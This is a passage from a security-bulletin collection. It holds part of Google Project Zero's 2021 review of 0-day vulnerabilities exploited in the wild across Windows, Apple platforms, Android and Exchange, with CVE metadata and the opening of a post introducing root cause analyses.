medic ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)) \n * 1 SuperFetch ([CVE-2021-31955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31955>))\n * 1 dwmcore.dll ([CVE-2021-28310](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>))\n * 1 ntfs.sys ([CVE-2021-31956](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31956>))\n\nThe number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of those 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10 Microsoft began dedicating more and more resources to locking down the attack surface of Win32k so as those older versions have hit end-of-life, Win32k is a less and less attractive attack surface.\n\nSimilar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn\u2019t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, [CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>), is due to [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>) is a use-after-free in NtGdiResetDC due to the object being freed during the user callback. \n\n## iOS/macOS\n\nAs discussed in the \u201cMore disclosure\u201d section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day ([CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>)) was also found. In this section we\u2019re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).\n\n[![Bar graph showing the number of macOS and iOS itw 0-days discovered per year. macOs is 0 for every year except 2021 when 1 was discovered. iOS - 2015: 0, 2016: 2, 2017: 0, 2018: 2, 2019: 0, 2020: 3, 2021: 5. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPGaOlQUGIYyvpDY_M0rGh3JekH4mwXHfN459HYcklg74v4Mfp8j6fgh2SM09mjhA4svdgN_TdSN3R5Bb-DJTHnlo63qnRTsvLs1EZgAE3fBpRtsZhxKhyBNTb_khdS6mNT3EtSHnS_R-TshtHx-gSWnEPpHjmSqO_9Y7JxupGcDKZ0-xwsxgbX6zR/s1200/image6%284%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPGaOlQUGIYyvpDY_M0rGh3JekH4mwXHfN459HYcklg74v4Mfp8j6fgh2SM09mjhA4svdgN_TdSN3R5Bb-DJTHnlo63qnRTsvLs1EZgAE3fBpRtsZhxKhyBNTb_khdS6mNT3EtSHnS_R-TshtHx-gSWnEPpHjmSqO_9Y7JxupGcDKZ0-xwsxgbX6zR/s1200/image6%284%29.png>)\n\nFor the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:\n\n * IOMobileFrameBuffer ([CVE-2021-30807](<https://support.apple.com/en-us/HT212623>), [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>))\n * XNU Kernel ([CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) & [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>))\n * CoreGraphics ([CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>))\n * CommCenter ([FORCEDENTRY sandbox escape](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>) \\- CVE requested, not yet assigned)\n\nThese 4 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used [CVE-2016-4654](<https://www.blackhat.com/docs/us-16/materials/us-16-Wang-Pangu-9-Internals.pdf>), a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen\u2019s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP. It\u2019s a popular attack surface because historically it\u2019s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. [CVE-2021-30807](<https://support.apple.com/en-us/HT212623>) is an out-of-bounds read and [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>) is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 0-day in IOMobileFrameBuffer, [CVE-2022-22587](<https://support.apple.com/en-us/HT213053>).\n\nOne iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel and both vulnerabilities were in code related to XNU\u2019s inter-process communication (IPC) functionality. [CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) exploited a vulnerability in mach vouchers while [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) exploited a vulnerability in mach messages. This is not the first time we\u2019ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. [CVE-2019-6625](<https://support.apple.com/en-us/HT209443>) was exploited as a part of [an exploit chain targeting iOS 11.4.1-12.1.2](<https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-5.html>) and was also a [vulnerability in mach vouchers](<https://googleprojectzero.blogspot.com/2019/01/voucherswap-exploiting-mig-reference.html>). \n\nMach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>) & [CVE-2020-27950](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27950.html>). This year\u2019s [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) is a pretty close variant to 2020\u2019s [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>). Tielei Wang and Xinru Chi actually [presented on this vulnerability at zer0con 2021](<https://github.com/wangtielei/Slides/blob/main/zer0con21.pdf>) in April 2021. In their presentation, they explained that they found it while doing variant analysis on [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>). [TieLei Wang explained via Twitter](<https://twitter.com/WangTielei/status/1486266258152726530>) that they had found the vulnerability in December 2020 and had noticed it was fixed in beta versions of iOS 14.4 and macOS 11.2 which is why they presented it at Zer0Con. The in-the-wild exploit only targeted macOS 10, but used the same exploitation technique as the one presented.\n\nThe two FORCEDENTRY exploits ([CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) and the [sandbox escape](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>)) were the only times that made us all go \u201cwow!\u201d this year. For [CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), the integer overflow in CoreGraphics, it was because: \n\n 1. For years we\u2019ve all heard about how attackers are using 0-click iMessage bugs and finally we have a public example, and\n 2. The exploit was an impressive work of art. \n\nThe sandbox escape (CVE requested, not yet assigned) was impressive because it\u2019s one of the few times we\u2019ve seen a sandbox escape in-the-wild that uses only logic bugs, rather than the standard memory corruption bugs. \n\nFor [CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), the vulnerability itself wasn\u2019t especially notable: a classic integer overflow within the JBIG2 parser of the CoreGraphics PDF decoder. The exploit, though, was described by Samuel Gro\u00df & Ian Beer as \u201cone of the most technically sophisticated exploits [they]\u2019ve ever seen\u201d. [Their blogpost shares all the details](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), but the highlight is that the exploit uses the logical operators available in JBIG2 to build NAND gates which are used to build its own computer architecture. The exploit then writes the rest of its exploit using that new custom architecture. From their blogpost:\n\nUsing over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.\n\nThe bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.\n\nThis is an example of what making 0-day exploitation hard could look like: attackers having to develop a new and novel way to exploit a bug and that method requires lots of expertise and/or time to develop. This year, the two FORCEDENTRY exploits were the only 0-days out of the 58 that really impressed us. Hopefully in the future, the bar has been raised such that this will be required for any successful exploitation.\n\n## Android\n\nThere were 7 Android in-the-wild 0-days detected and disclosed this year. Prior to 2021 there had only been 1 and it was in 2019: [CVE-2019-2215](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-2215.html>). Like WebKit, this lack of data makes it hard for us to assess trends and changes. Instead, we\u2019ll compare it to public security research.\n\nFor the 7 Android 0-days they targeted the following components:\n\n * Qualcomm Adreno GPU driver ([CVE-2020-11261](<https://source.android.com/security/bulletin/2021-01-01>), [CVE-2021-1905](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1905.html>), [CVE-2021-1906](<https://source.android.com/security/bulletin/2021-05-01>))\n * ARM Mali GPU driver ([CVE-2021-28663](<https://source.android.com/security/bulletin/2021-05-01>), [CVE-2021-28664](<https://source.android.com/security/bulletin/2021-05-01>))\n * Upstream Linux kernel ([CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>), [CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>))\n\n5 of the 7 0-days from 2021 targeted GPU drivers. This is actually not that surprising when we consider the evolution of the Android ecosystem as well as recent public security research into Android. The Android ecosystem is quite fragmented: many different kernel versions, different manufacturer customizations, etc. If an attacker wants a capability against \u201cAndroid devices\u201d, they generally need to maintain many different exploits to have a decent percentage of the Android ecosystem covered. However, if the attacker chooses to target the GPU kernel driver instead of another component, they will only need to have two exploits since most Android devices use 1 of 2 GPUs: either the Qualcomm Adreno GPU or the ARM Mali GPU. \n\nPublic security research mirrored this choice in the last couple of years as well. When developing full exploit chains (for defensive purposes) to target Android devices, [Guang Gong](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>), [Man Yue Mo](<https://securitylab.github.com/research/one_day_short_of_a_fullchain_android/>), and [Ben Hawkes](<https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html>) all chose to attack the GPU kernel driver for local privilege escalation. Seeing the in-the-wild 0-days also target the GPU was more of a confirmation rather than a revelation. Of the 5 0-days targeting GPU drivers, 3 were in the Qualcomm Adreno driver and 2 in the ARM Mali driver. \n\nThe two non-GPU driver 0-days ([CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>) and [CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>)) targeted the upstream Linux kernel. Unfortunately, these 2 bugs shared a singular characteristic with the Android in-the-wild 0-day seen in 2019: all 3 were previously known upstream before their exploitation in Android. While the sample size is small, it\u2019s still quite striking to see that 100% of the known in-the-wild Android 0-days that target the kernel are bugs that actually were known about before their exploitation.\n\nThe vulnerability now referred to as [CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>) was actually found in September 2016 and [discussed on the Linux kernel mailing lists](<https://lore.kernel.org/lkml/CAOssrKcfncAYsQWkfLGFgoOxAQJVT2hYVWdBA6Cw7hhO8RJ_wQ@mail.gmail.com/>). A [patch was even developed back in 2016](<https://lore.kernel.org/lkml/1475150954-10152-1-git-send-email-mszeredi@redhat.com/>), but it didn\u2019t end up being submitted. The bug was finally [fixed in the Linux kernel in July 2021](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cbcf01128d0a92e131bd09f1688fe032480b65ca>) after the detection of the in-the-wild exploit targeting Android. The patch then made it into the [Android security bulletin in November 2021](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>).\n\n[CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>) remained unpatched in Android for 14 months after it was patched in the Linux kernel. The Linux kernel was actually only vulnerable to the issue for a few weeks, but due to Android patching practices, that few weeks became almost a year for some Android devices. If an Android OEM synced to the upstream kernel, then they likely were patched against the vulnerability at some point. But many devices, such as recent Samsung devices, had not and thus were left vulnerable.\n\n## Microsoft Exchange Server\n\nIn 2021, there were 5 in-the-wild 0-days targeting Microsoft Exchange Server. This is the first time any Exchange Server in-the-wild 0-days have been detected and disclosed since we began tracking in-the-wild 0-days. The first four ([CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>)) were all disclosed and patched at the same time and used together in a [single operation](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). The fifth ([CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>)) was patched on its own in November 2021. [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>) was demonstrated at Tianfu Cup and then discovered in-the-wild by Microsoft. While no other in-the-wild 0-days were disclosed as part of the chain with [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>), the attackers would have required at least another 0-day for successful exploitation since [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>) is a post-authentication bug.\n\nOf the four Exchange in-the-wild 0-days used in the first campaign, [CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>), which is also known as \u201cProxyLogon\u201d, is the only one that\u2019s pre-auth. [CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>) is a server side request forgery (SSRF) vulnerability that allows unauthenticated attackers to send arbitrary HTTP requests as the Exchange server. The other three vulnerabilities were post-authentication. For example, [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) allowed attackers to write arbitrary files to the system. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is a remote code execution vulnerability due to a deserialization bug in the Unified Messaging service. This allowed attackers to run code as the privileged SYSTEM user.\n\nFor the second campaign, [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>), like [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), is a post-authentication RCE vulnerability due to insecure deserialization. It seems that while attempting to harden Exchange, Microsoft inadvertently introduced another deserialization vulnerability.\n\nWhile there were a significant amount of 0-days in Exchange detected and disclosed in 2021, it\u2019s important to remember that they were all used as 0-day in only two different campaigns. This is an example of why we don\u2019t suggest using the number of 0-days in a product as a metric to assess the security of a product. Requiring the use of four 0-days for attackers to have success is preferable to an attacker only needing one 0-day to successfully gain access.\n\nWhile this is the first time Exchange in-the-wild 0-days have been detected and disclosed since Project Zero began our tracking, this is not unexpected. In 2020 there was [n-day exploitation of Exchange Servers](<https://www.cisa.gov/uscert/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>). Whether this was the first year that attackers began the 0-day exploitation or if this was the first year that defenders began detecting the 0-day exploitation, this is not an unexpected evolution and we\u2019ll likely see it continue into 2022.\n\n# Outstanding Questions\n\nWhile there has been progress on detection and disclosure, that progress has shown just how much work there still is to do. The more data we gained, the more questions that arose about biases in detection, what we\u2019re missing and why, and the need for more transparency from both vendors and researchers.\n\nUntil the day that attackers decide to happily share all their exploits with us, we can\u2019t fully know what percentage of 0-days are publicly known about. However when we pull together our expertise as security researchers and anecdotes from others in the industry, it paints a picture of some of the data we\u2019re very likely missing. From that, these are some of the key questions we\u2019re asking ourselves as we move into 2022:\n\n## Where are the [x] 0-days?\n\nDespite the number of 0-days found in 2021, there are key targets missing from the 0-days discovered. For example, we know that messaging applications like WhatsApp, Signal, Telegram, etc. are targets of interest to attackers and yet there\u2019s only 1 messaging app, in this case iMessage, 0-day found this past year. Since we began tracking in mid-2014 the total is two: a WhatsApp 0-day in 2019 and this iMessage 0-day found in 2021.\n\nAlong with messaging apps, there are other platforms/targets we\u2019d expect to see 0-days targeting, yet there are no or very few public examples. For example, since mid-2014 there\u2019s only one in-the-wild 0-day each for macOS and Linux. There are no known in-the-wild 0-days targeting cloud, CPU vulnerabilities, or other phone components such as the WiFi chip or the baseband.\n\nThis leads to the question of whether these 0-days are absent due to lack of detection, lack of disclosure, or both?\n\n## Do some vendors have no known in-the-wild 0-days because they\u2019ve never been found or because they don\u2019t publicly disclose?\n\nUnless a vendor has told us that they will publicly disclose exploitation status for all vulnerabilities in their platforms, we, the public, don\u2019t know if the absence of an annotation means that there is no known exploitation of a vulnerability or if there is, but the vendor is just not sharing that information publicly. Thankfully this question is something that has a pretty clear solution: all device and software vendors agreeing to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited in-the-wild.\n\n## Are we seeing the same bug patterns because that\u2019s what we know how to detect?\n\nAs we described earlier in this report, all the 0-days we saw in 2021 had similarities to previously seen vulnerabilities. This leads us to wonder whether or not that\u2019s actually representative of what attackers are using. Are attackers actually having success exclusively using vulnerabilities in bug classes and components that are previously public? Or are we detecting all these 0-days with known bug patterns because that\u2019s what we know how to detect? Public security research would suggest that yes, attackers are still able to have success with using vulnerabilities in known components and bug classes the majority of the time. But we\u2019d still expect to see a few novel and unexpected vulnerabilities in the grouping. We posed this question back in the 2019 year-in-review and it still lingers. \n\n## Where are the spl0itz?\n\nTo successfully exploit a vulnerability there are two key pieces that make up that exploit: the vulnerability being exploited, and the exploitation method (how that vulnerability is turned into something useful). \n\nUnfortunately, this report could only really analyze one of these components: the vulnerability. Out of the 58 0-days, only 5 have an exploit sample publicly available. Discovered in-the-wild 0-days are the failure case for attackers and a key opportunity for defenders to learn what attackers are doing and make it harder, more time-intensive, more costly, to do it again. Yet without the exploit sample or a detailed technical write-up based upon the sample, we can only focus on fixing the vulnerability rather than also mitigating the exploitation method. This means that attackers are able to continue to use their existing exploit methods rather than having to go back to the design and development phase to build a new exploitation method. While acknowledging that sharing exploit samples can be challenging (we have that challenge too!), we hope in 2022 there will be more sharing of exploit samples or detailed technical write-ups so that we can come together to use every possible piece of information to make it harder for the attackers to exploit more users.\n\nAs an aside, if you have an exploit sample that you\u2019re willing to share with us, please reach out. Whether it\u2019s sharing with us and having us write a detailed technical description and analysis or having us share it publicly, we\u2019d be happy to work with you.\n\n# Conclusion\n\nLooking back on 2021, what comes to mind is \u201cbaby steps\u201d. We can see clear industry improvement in the detection and disclosure of 0-day exploits. But the better detection and disclosure has highlighted other opportunities for progress. As an industry we\u2019re not making 0-day hard. Attackers are having success using vulnerabilities similar to what we\u2019ve seen previously and in components that have previously been discussed as attack surfaces.The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. And while we made distinct progress in detection and disclosure it has shown us areas where that can continue to improve.\n\nWhile this all may seem daunting, the promising part is that we\u2019ve done it before: we have made clear progress on previously daunting goals. In 2019, we discussed the large detection deficit for 0-day exploits and 2 years later more than double were detected and disclosed. So while there is still plenty more work to do, it\u2019s a tractable problem. There are concrete steps that the tech and security industries can take to make it even more progress: \n\n\n 1. Make it an industry standard behavior for all vendors to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited,\n 2. Vendors and security researchers sharing exploit samples or detailed descriptions of the exploit techniques.\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.\n\nThrough 2021 we continually saw the real world impacts of the use of 0-day exploits against users and entities. Amnesty International, the Citizen Lab, and others highlighted [over](<https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/>) and [over](<https://www.amnesty.org/en/documents/doc10/4491/2021/en/>) how governments were using commercial surveillance products against [journalists](<https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/>), [human rights defenders](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>), and [government officials](<https://www.reuters.com/technology/exclusive-us-state-department-phones-hacked-with-israeli-company-spyware-sources-2021-12-03/>). We saw many enterprises scrambling to remediate and protect themselves from the [Exchange Server 0-days](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). And we even learned of peer [security researchers being targeted by ](<https://blog.google/threat-analysis-group/update-campaign-targeting-security-researchers/>)[North Korean government hackers](<https://blog.google/threat-analysis-group/update-campaign-targeting-security-researchers/>). While the majority of people on the planet do not need to worry about their own personal risk of being targeted with 0-days, 0-day exploitation still affects us all. These 0-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful in these attacks.\n\n2021 showed us we\u2019re on the right track and making progress, but there\u2019s plenty more to be done to make 0-day hard.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-19T00:00:00", "type": "googleprojectzero", "title": "\nThe More You Know, The More You Know You Don\u2019t Know\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4654", "CVE-2019-13720", "CVE-2019-2215", "CVE-2019-6625", "CVE-2020-0688", "CVE-2020-11261", "CVE-2020-16009", "CVE-2020-27932", "CVE-2020-27950", "CVE-2021-0920", "CVE-2021-1048", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1844", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-28310", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30737", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-30883", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-36948", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-41773", "CVE-2021-42321", "CVE-2022-21882", "CVE-2022-22587"], "modified": "2022-04-19T00:00:00", "id": "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156", "href": "https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T02:00:35", "description": "# Posted by Maddie Stone, Project Zero\n\n** \n**\n\nWhen a 0-day is exploited in the wild AND it is detected, we need to use that as an opportunity to learn as much as possible about the vulnerability and the exploit if we hope to make 0-day hard. One of the main methods to do that is to perform a root cause analysis (RCA) on the 0-day. \n\n** \n**\n\nOur effort on this began in earnest in the last quarter of 2019. Today we are beginning to publish the root cause analyses for 0-days exploited in the wild that we have completed. While we\u2019re publishing some in bulk now to play \u201ccatch-up\u201d, in the future we plan to post each one in a timely manner after it\u2019s detected and disclosed. We think publishing technical details in a timely manner is important for transparency and so that the whole of the security community can make informed decisions and actions. \n\n** \n**\n\nWe\u2019ve added a new column to the [\u201c0day In the Wild\u201d tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) that will link to any RCAs that we publish. We will also continue to update the following page on our blog as we publish additional RCAs.\n\n** \n**\n\n[0-Day Exploit Root Cause Analyses](<https://googleprojectzero.blogspot.com/p/rca.html>)\n\n** \n**\n\nFor each of these root cause analyses, we are using a template. We developed this template based on what we, at Project Zero, find important and actionable about 0-days exploited in-the-wild, but we\u2019d love your feedback on what other information would help you! We welcome any researchers and vendors who want to use our [template](<https://docs.google.com/document/d/1z1s__qj16DdhRvAg_TJlmRrXKosUSWfpm463Mjk24Vs/view>) and publish this information about 0-days they detect and/or analyze! \n\n** \n**\n\nWhen completing a root cause analysis we focus on the following areas.\n\n * Bug class\n\n * Details of the vulnerability, such as how to trigger, what it allows, etc.\n\n * Exploit method and whether or not it\u2019s a known method\n\n * Hypothesis of how the vulnerability was found (code audit, fuzzing, variant analysis, etc.)\n\n * Any historical, present, and future bug context such as previous related bugs\n\n * Areas for variant analysis and any found variants\n\n * Structural improvements\n\n * Can you also kill the entire bug class?\n\n * Is there a way to make it much harder to exploit?\n\n * Potential detection methods for similar 0-days\n\n * Brainstorming ways that this 0-day exploit could have been caught while it was still a 0-day. Please note that this is different from \u201cindicators of compromise\u201d because we\u2019re focusing on detecting while it\u2019s still a 0-day.\n\n** \n**\n\nWe selected these areas because the vulnerability details and exploit method provide in-depth explanation of facts of the exploit: what is the vulnerability, how does it work, and how was it exploited. Once we have the facts documented, we can then use those facts to inform our hypotheses and brainstorm how we can prevent the attackers from being able to do it again. While some of these ideas may be considered infeasible by vendors or not work well in practice, some will be (and already have been) reasonable and able to be launched. The overarching goal is to force brainstorming in the hope of taking actions informed by the detected 0-day: actions to better detect, actions to better lockdown, actions to prevent new vulnerabilities from being introduced, actions to make 0-day hard.\n\n** \n**\n\nOut of the 20 0-days for 2019 (more on what we decided to include/exclude in our tracking here), we completed 8 root cause analyses that we\u2019re publishing here today. These are 5 out of the 6 of the 0-days detected in August or later of 2019 (when I joined the team and started this initiative \ud83d\ude42 ). In addition, we\u2019re publishing the two iOS 0-days from February 2019 that Project Zero reported to Apple in partnership with [Google's Threat Analysis Group](<https://blog.google/threat-analysis-group>), and a Firefox 0-day that Project Zero had reported to Firefox, that was also discovered independently in-the-wild.\n\n** \n**\n\n * [CVE-2019-7286](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-7286.html>): iOS use-after-free in CFPrefsDaemon\n\n * [CVE-2019-7287](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-7287.html>): iOS buffer overflow in ProvInfoIOKitUserClient\n\n * [CVE-2019-1107](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-11707.html>): Firefox type confusion in Array.pop\n\n * [CVE-2019-1367](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>): JScript use-after-free in Internet Explorer\n\n * [CVE-2019-2215](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-2215.html>): Android use-after-free in Binder\n\n * [CVE-2019-13720](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-13720.html>): Chrome use-after-free in webaudio\n\n * CVE-2019-1429: JScript use-after-free in Internet Explorer (See [CVE-2019-1367](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>))\n\n * [CVE-2019-1458](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html>): Windows win32k uninitialized variable in task switching\n\n** \n**\n\nThese RCAs provide technical details on what the vulnerability is and how it is exploited. We then hypothesize and brainstorm based on these details from our perspective as offensive security researchers. \n\n 